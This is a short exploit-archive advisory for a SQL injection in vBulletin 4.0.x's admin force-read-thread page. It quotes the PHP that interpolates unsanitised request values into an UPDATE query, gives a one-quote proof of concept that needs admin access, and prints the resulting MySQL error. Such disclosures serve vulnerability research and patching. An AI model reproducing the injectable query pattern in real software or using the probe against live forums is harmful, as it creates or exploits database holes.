vBulletin 4.0.x SQL Injection

2013-07-24T00:00:00
ID PACKETSTORM:122533
Type packetstorm
Reporter n3tw0rk
Modified 2013-07-24T00:00:00

Description

                                        
                                            `# Exploit Title: vBulletin force Read Thread 0day #  
# Author(s): n3tw0rk #  
# Contact: Mail:infectedelite@gmail.com #  
# Product: 4.0.x #  
# Software Version x.x.x #  
# Product Download:  
http://www.vbulletin.org/forum/showthread.php?t=241754&page=18  
#  
# Google Dork: use your mind #  
# Homepage: d4tabase.com #  
_____________________________________________________________#  
  
The exploit is caused due to a variable named 'update_order' not being  
sanitized before being used within an insert into statement.  
  
if ($_REQUEST['do'] == 'update_order')  
{  
$vbulletin->input->clean_array_gpc('r', array(  
'force_read_order' => TYPE_ARRAY  
));  
  
if ($vbulletin->GPC['force_read_order'])  
{  
foreach ($vbulletin->GPC['force_read_order'] AS $threadid => $order)  
{  
$db->query_write("  
UPDATE " . TABLE_PREFIX . "thread AS thread  
SET force_read_order = '$order'  
WHERE threadid = '$threadid'  
");  
}  
}  
POC  
You will need Admincp Access then go to  
site.com/admincp/force_read_thread.php then in the force read order colum  
put a ' into one of them to show this  
Database error in vBulletin 4.2.1:  
  
Invalid SQL:  
  
UPDATE thread AS thread  
SET force_read_order = '1''  
WHERE threadid = '5161';  
  
MySQL Error : You have an error in your SQL syntax; check the manual that  
corresponds to your MySQL server version for the right syntax to use near  
'5161'' at line 2  
Error Number : 1064  
Request Date : Thursday, July 25th 2013 @ 01:20:52 AM  
Error Date : Thursday, July 25th 2013 @ 01:20:52 AM  
Script :  
http://d4tabase.com/admincp/force_read_thread.php?do=update_order  
Referrer : http://d4tabase.com/admincp/force_read_thread.php  
IP Address :  
Username : n3tw0rk  
Classname :  
MySQL Version :  
`